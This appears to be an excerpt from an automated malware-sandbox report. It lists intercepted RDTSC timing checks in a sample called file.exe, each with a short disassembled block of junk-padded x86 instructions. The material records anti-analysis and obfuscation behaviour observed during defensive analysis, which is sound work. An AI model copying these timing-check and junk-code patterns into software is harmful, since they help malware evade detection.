Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB0746 second address: AB0751 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FDE8C51D4D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB8F73 second address: AB8FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnp 00007FDE8CE8B4C6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jbe 00007FDE8CE8B4E5h 0x00000015 jmp 00007FDE8CE8B4CFh 0x0000001a jmp 00007FDE8CE8B4D0h 0x0000001f pushad 0x00000020 push eax 0x00000021 jmp 00007FDE8CE8B4CFh 0x00000026 jnl 00007FDE8CE8B4C6h 0x0000002c pop eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7757A second address: A775A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edi, dword ptr [ebp+1245066Fh] 0x00000012 lea eax, dword ptr [ebp+1247C2FEh] 0x00000018 stc 0x00000019 push eax 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A775A1 second address: A775A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7764F second address: A77653 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A77BF8 second address: A77C10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE8CE8B4D4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A77C10 second address: A77C14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A77D13 second address: A77D5E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDE8CE8B4CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f pushad 0x00000010 je 00007FDE8CE8B4C6h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 popad 0x00000019 push eax 0x0000001a jmp 00007FDE8CE8B4CCh 0x0000001f pop eax 0x00000020 popad 0x00000021 mov eax, dword ptr [eax] 0x00000023 jo 00007FDE8CE8B4D2h 0x00000029 jne 00007FDE8CE8B4CCh 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A77D5E second address: A77D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FDE8C51D4D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A77D69 second address: A77D70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A77E20 second address: A77E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A77E26 second address: A77E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FDE8CE8B4D8h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jns 00007FDE8CE8B4CCh 0x00000013 jo 00007FDE8CE8B4CCh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A77F85 second address: A77F9A instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDE8C51D4DCh 0x00000008 ja 00007FDE8C51D4D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A77F9A second address: A77FF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007FDE8CE8B4C8h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 push ebx 0x00000022 ja 00007FDE8CE8B4C8h 0x00000028 pop edx 0x00000029 add edi, 5F85A936h 0x0000002f push 00000004h 0x00000031 add dword ptr [ebp+122D2A0Bh], esi 0x00000037 push eax 0x00000038 pushad 0x00000039 jmp 00007FDE8CE8B4D3h 0x0000003e push eax 0x0000003f push edx 0x00000040 push esi 0x00000041 pop esi 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A78385 second address: A7838A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7838A second address: A783D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 je 00007FDE8CE8B4C6h 0x0000000e push 0000001Eh 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007FDE8CE8B4C8h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a clc 0x0000002b push eax 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FDE8CE8B4D2h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A784F2 second address: A784F7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A78757 second address: A787E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FDE8CE8B4C8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D3933h], ecx 0x0000002a jmp 00007FDE8CE8B4D7h 0x0000002f lea eax, dword ptr [ebp+1247C342h] 0x00000035 mov di, 078Fh 0x00000039 push eax 0x0000003a jmp 00007FDE8CE8B4D5h 0x0000003f mov dword ptr [esp], eax 0x00000042 mov ecx, dword ptr [ebp+122D2C2Fh] 0x00000048 lea eax, dword ptr [ebp+1247C2FEh] 0x0000004e movsx ecx, bx 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 jnp 00007FDE8CE8B4C6h 0x0000005b jnp 00007FDE8CE8B4C6h 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB80E8 second address: AB80FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a je 00007FDE8C51D4D6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB80FF second address: AB8119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8CE8B4D3h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB8119 second address: AB811E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB811E second address: AB815F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FDE8CE8B4C6h 0x0000000a pop edi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007FDE8CE8B4D6h 0x00000013 push edx 0x00000014 jmp 00007FDE8CE8B4D6h 0x00000019 pop edx 0x0000001a pushad 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB815F second address: AB8168 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB8168 second address: AB816C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB816C second address: AB8180 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB82CF second address: AB82D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB843E second address: AB8460 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDE8C51D4D6h 0x00000008 jl 00007FDE8C51D4D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FDE8C51D4E2h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB85CA second address: AB85DA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FDE8CE8B4C6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB85DA second address: AB85DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB85DE second address: AB85E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB85E8 second address: AB85EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB88A0 second address: AB88A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB88A4 second address: AB88AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB88AA second address: AB88B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB88B4 second address: AB88BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB88BA second address: AB88BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABD200 second address: ABD204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABD204 second address: ABD20A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABD8A0 second address: ABD8A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABD8A9 second address: ABD8AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABD8AD second address: ABD8C5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FDE8C51D4DAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007FDE8C51D4E2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABD8C5 second address: ABD8CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABD8CB second address: ABD8D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 js 00007FDE8C51D4DCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABDC14 second address: ABDC48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FDE8CE8B4D8h 0x0000000e push esi 0x0000000f jmp 00007FDE8CE8B4CBh 0x00000014 jl 00007FDE8CE8B4C6h 0x0000001a pop esi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABDC48 second address: ABDC5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E1h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABE1D8 second address: ABE1DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABE1DE second address: ABE1F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDE8C51D4DEh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABE1F2 second address: ABE20B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FDE8CE8B4D3h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABE20B second address: ABE20F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABE20F second address: ABE241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007FDE8CE8B4CDh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FDE8CE8B4D8h 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC24BF second address: AC24CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC24CA second address: AC24D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC24D5 second address: AC24D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC24D9 second address: AC24DF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC4758 second address: AC4768 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDE8C51D4D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC4768 second address: AC476C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC42B2 second address: AC42C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8C51D4E2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC42C8 second address: AC42DC instructions: 0x00000000 rdtsc 0x00000002 jc 00007FDE8CE8B4C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FDE8CE8B4C6h 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC42DC second address: AC42EC instructions: 0x00000000 rdtsc 0x00000002 jc 00007FDE8C51D4D6h 0x00000008 jng 00007FDE8C51D4D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC4440 second address: AC4446 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC4446 second address: AC444C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACB566 second address: ACB598 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FDE8CE8B4CFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FDE8CE8B4D3h 0x00000010 popad 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jp 00007FDE8CE8B4C6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACB736 second address: ACB73C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACB73C second address: ACB746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACEFE7 second address: ACEFEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACEFEB second address: ACF000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007FDE8CE8B4C6h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACE9B7 second address: ACE9D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8C51D4E9h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACE9D6 second address: ACE9DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACECDB second address: ACECE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FDE8C51D4D6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACECE8 second address: ACED01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD5850 second address: AD5856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD5B3D second address: AD5B48 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jp 00007FDE8CE8B4C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD5B48 second address: AD5B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD5CDA second address: AD5CE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD5CE7 second address: AD5CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD5CEB second address: AD5D13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FDE8CE8B4D0h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FDE8CE8B4CCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD5D13 second address: AD5D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD5E47 second address: AD5E79 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDE8CE8B4C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FDE8CE8B4D3h 0x0000000f jmp 00007FDE8CE8B4D1h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD5E79 second address: AD5E7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADF39F second address: ADF3BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jng 00007FDE8CE8B4C8h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 jmp 00007FDE8CE8B4CBh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADF3BE second address: ADF3D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4DAh 0x00000007 jmp 00007FDE8C51D4DBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADD3A1 second address: ADD3A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADD3A5 second address: ADD3AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADD502 second address: ADD52F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8CE8B4D1h 0x00000009 jbe 00007FDE8CE8B4C6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FDE8CE8B4CDh 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADD52F second address: ADD535 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADD535 second address: ADD56B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007FDE8CE8B4C6h 0x0000000d jc 00007FDE8CE8B4C6h 0x00000013 jmp 00007FDE8CE8B4D1h 0x00000018 popad 0x00000019 popad 0x0000001a jnp 00007FDE8CE8B4F9h 0x00000020 push eax 0x00000021 push edx 0x00000022 jp 00007FDE8CE8B4C6h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADD56B second address: ADD56F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADD56F second address: ADD58D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADD6B9 second address: ADD6CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007FDE8C51D4D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007FDE8C51D4DCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADD6CD second address: ADD6D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
